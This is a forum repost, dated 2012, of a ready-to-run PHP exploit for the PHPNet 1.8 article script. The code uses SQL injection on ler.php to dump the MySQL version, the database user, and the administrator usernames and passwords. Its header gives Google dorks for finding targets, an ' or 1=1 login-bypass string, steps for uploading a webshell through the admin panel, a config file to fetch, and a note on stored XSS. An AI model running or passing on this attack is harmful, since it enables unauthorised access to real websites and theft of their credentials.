The_Arhitect Posted June 8, 2012 Report Posted June 8, 2012 PHPNet <= 1.8 (ler.php) SQL Injection<?php # Exploit Title: PHPNet <= 1.8 (ler.php) SQL Injection# Exploit Author: WhiteCollarGroup# Date: 06th 06 2012# Vendor homepage: http://www.phpnet.com.br/# Software Link: http://phpbrasil.com/script/Wb03ErMczAho/phpnetartigos# Google Dork: intext:"Powerd by Nielson Rocha"# Google Dork: inurl:"ler.php?id=" intext:"Voltar - Imprimir"# Version: 1.8# Tested on: Debian GNU/Linux,Windows 7 Ultimate/*We discovered multiple vulnerabilities on the system. ~> SQL InjectionThis exploit is for a vulnerability in ler.php, but are the same vulnerability on imprimir.php and imagem.php.ler.php?id=[SQLi]imprimir.php?id=[SQLi]imagem.php?id=[SQLi]Usage:php file.php http://server/path/ ~> Login bypassIn login page, you can bypass the login using "SQLi strings".Go to http://server/path/admin/login.phpLogin: ' or 1=1-- wcPass: wcgroup ~> Arbitraty File Upload After open administration panel, try to add a new article. Use the upload form to upload your webshell. After posting, access: http://server/path/tmp/your_shell_filename.php ~> Information disclosure Access: http://server/path/conf/config.ini ~> XSS Stored (persistent) When posting a new article, you can post (D)HTML/Javascript codes on the page.*/function _printf($str) { echo $str."\n";}function hex($string){ $hex=''; // PHP 'Dim' =] for ($i=0; $i < strlen($string); $i++){ $hex .= dechex(ord($string[$i])); } return '0x'.$hex;}set_time_limit(0);error_reporting(E_ERROR & E_USER_WARNING);@ini_set('default_socket_timeout', 30);echo "\n";echo "PHPNet <= 1.8 SQLi Exploit\n";echo "Discovered by WhiteCollarGroup\n";echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com";if($argc!=2) { _printf("Usage:"); _printf("php $argv[0] <target>"); _printf("Example:"); _printf("php $argv[0] http://site.com/path/"); exit;}$target = $argv[1];if(substr($target, (strlen($target)-1))!="/") { // se o ultimo caractere nao for uma barra $target .= "/"; }$inject = $target . "ler.php?id=-0'%20"; $token = uniqid();$token_hex = hex($token);// vamos agora obter os seguintes dados: user() version()echo "\n\n[*] Trying to get informations...\n";$infos = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",version(),".$token_hex.",user(),".$token_hex."),6,7,8-- "));$infos_r = array();preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r);$user = $infos_r[1][0];$version = $infos_r[2][0];if(($user) AND ($version)) { echo "[!] MySQL user: $user\n"; echo "[!] MySQL version: $version\n";} else{ echo "[-] Error while getting informations...\n";}$i = 0;while(1==1) { $dados_r = array(); $dados = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",admin_user,".$token_hex.",admin_pass,".$token_hex."),6,7,8 from pna_admin limit $i,1-- ")); preg_match_all("/$token(.*)$token(.*)$token/", $dados, $dados_r); $login = $dados_r[1][0]; $senha = $dados_r[2][0]; if(($login) AND ($senha)) { echo " -+-\n"; echo "[!] User: $login\n"; echo "[!] Pass: $senha\n"; $i++; } else { break; // exitloop } if($i==0) { echo "[-] Exploit failed. Make sure that's server is using a valid version of PHPNet without mod_security. We're sorry."; } else { echo " -+-\n[!] :D"; } echo "\n";}?>Sursa: PHPNet <= 1.8 (ler.php) SQL Injection Quote